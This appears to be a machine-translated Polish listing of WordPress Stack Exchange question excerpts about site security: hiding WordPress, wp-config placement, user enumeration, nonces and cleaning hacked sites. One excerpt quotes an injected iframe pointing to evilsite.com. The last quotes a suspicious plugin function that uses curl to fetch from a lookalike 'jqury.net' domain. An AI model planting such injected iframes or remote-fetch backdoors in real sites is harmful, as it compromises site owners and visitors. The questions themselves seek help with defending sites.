Wzmocnienie motywów, wtyczek i instalacji rdzenia, aby zapobiec włamaniom.
Mam stronę internetową, dla której staramy się dyskretnie informować o tym, że korzystamy z WordPress. Jakie kroki możemy podjąć, aby uczynić to mniej oczywistym? EDYCJA - Ważna uwaga bezpieczeństwa: Proszę zrozumieć, że robienie tego doskonale jest niemożliwe zgodnie z odpowiedzią Marka , więc...
Jedną z najczęstszych najlepszych praktyk bezpieczeństwa w dzisiejszych czasach wydaje się być przenoszenie o wp-config.phpjeden katalog wyżej niż katalog główny vhosta . Nigdy tak naprawdę nie znalazłem dobrego wytłumaczenia tego, ale zakładam, że minimalizuje to ryzyko złośliwego lub...
Mój fajny blog WordPress na http://fakeplasticrock.com (z WordPress 3.1.1) został zhakowany - wyświetlał się <iframe>na każdej stronie tak: <iframe src="http://evilsite.com/go/1"></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
Używam wordpress na prywatnej stronie, na której użytkownicy przesyłają pliki. Używam „Prywatnego WordPressa”, aby uniemożliwić dostęp do strony, jeśli użytkownik nie jest zalogowany. Chciałbym zrobić to samo z plikami przesłanymi w folderze uploads. Jeśli więc użytkownik nie jest zalogowany, nie...
Czy można zmienić nazwę folderu wp-admin? Wiem, że mógłbym po prostu zmienić jego nazwę, ale jeśli nie jest to obsługiwane przez kod, wiele rzeczy by się zepsuło. Jeśli użyję niestandardowej nazwy folderu, spowoduje to, że będzie ona nieco bezpieczniejsza, bezpieczeństwo przez niejasność i tak...
Podczas pisania wtyczek WordPress często trzeba skonfigurować opcje, dla których role w witrynie mają dostęp do określonych funkcji lub treści. Aby to zrobić, twórca wtyczki musi pobrać listę ról istniejących w witrynie, aby użyć jej w opcji. Ponieważ można tworzyć niestandardowe role, nie możemy...
Ostatnio miałem problem z tym, że nie byłem w stanie zainstalować wtyczki WP Smush Pro, ponieważ nie mam dostępnych opcji instalacji ręcznej ani instalacji jednym kliknięciem. Natknąłem się na ten post, który sugerował dostosowanie ustawień w wp-config.php. Dodałem sugerowane ustawienia, jednak...
Czy mogę zapobiec wyliczaniu nazw użytkowników w mojej witrynie Wordpress? W tej chwili widzę użytkowników za pomocą narzędzia
Od czasu do czasu natrafiam na następujący fragment motywu: if ( ! defined('ABSPATH')) exit('restricted access'); Jest na początku niektórych (wszystkich?) Plików PHP w motywie i ma zapobiegać bezpośredniemu dostępowi do pliku przez nikczemne źródła. Widzę, że nie jest to uwzględnione w...
Po pewnym czasie WP wylogowuje wszystkich użytkowników i zmusza ich do ponownego zalogowania. W przypadku środowisk programistycznych na moim komputerze lokalnym jest to nieprzyjemne i absolutnie niepotrzebne. Czy istnieje oparty na API sposób wyłączania automatycznego wylogowywania na czas...
Zaktualizowałem WordPress do 4.7.1, a potem próbowałem wyliczyć użytkowników za pomocą REST API, co powinno zostać naprawione, ale udało mi się odzyskać
W jakikolwiek sposób zmienić adres URL wp-login.php? Wydaje się niepewne, że każdy, kto kiedykolwiek korzystał z Wordpress, mógł łatwo sprawdzić, czy witryna go używa, i przejść bezpośrednio do strony logowania. Kiedyś istniała wtyczka o nazwie „Stealth login”, ale nie była aktualizowana. (I stąd...
Jaki jest najlepszy sposób na wyeliminowanie pliku xmlrpc.php z WordPress, gdy go nie
W obecnej formie to pytanie nie pasuje do naszego formatu pytań i odpowiedzi. Oczekujemy, że odpowiedzi poparte będą faktami, referencjami lub wiedzą specjalistyczną, ale to pytanie prawdopodobnie będzie wymagało debaty, argumentów, ankiet lub rozszerzonej dyskusji. Jeśli uważasz,...
Jaką różnicę powinienem zastosować? Wiem, że wp_verify_nonce sprawdza limit czasu, a check_admin_referer myślę, że wywołuje wp_verify_nonce, a także sprawdza segment adresu URL administratora, ale jestem nieco zdezorientowany, który powinienem użyć i kiedy. Dzięki za jasność....
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizuj pytanie, aby było tematyczne na WordPress Development Stack Exchange. Zamknięte 4 lata temu . Zainstalowałem wtyczkę Simple Login Lockdown...
Obecnie opracowuję wtyczkę i istnieje duże prawdopodobieństwo, że wydam ją w publicznym repozytorium wtyczek, aby inni mogli z niej korzystać. Wtyczka będzie korzystać z interfejsu API. Aby korzystać z tego interfejsu API, musisz podać nazwę użytkownika i hasło. Więc moja wtyczka musi przechowywać...
Miałem klienta, który został ostatnio zhakowany i zauważyłem, że na jej stronie pojawiają się dziwne postacie, takie jak  i Æ. Okazuje się, że hakerzy zmienili blog_charset na UTF-7 w wp_optionstabeli w bazie danych. Ustawiłem go z powrotem na UTF-8, ale zastanawiałem się, czy w czasie, gdy był...
Jestem nowy w WordPress. Niedawno przeczytałem artykuł o tym, jak hakerzy mogą wykorzystać luki we wtyczkach. Różne źródła, takie jak Google Pagespeed, również odradzają mi korzystanie z wtyczek lub przynajmniej ograniczają je do minimum. Osobiście staram się również unikać wtyczek, ponieważ mam...
Znalazłem to we wtyczce. Co to robi? czy to jest niebezpieczne? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...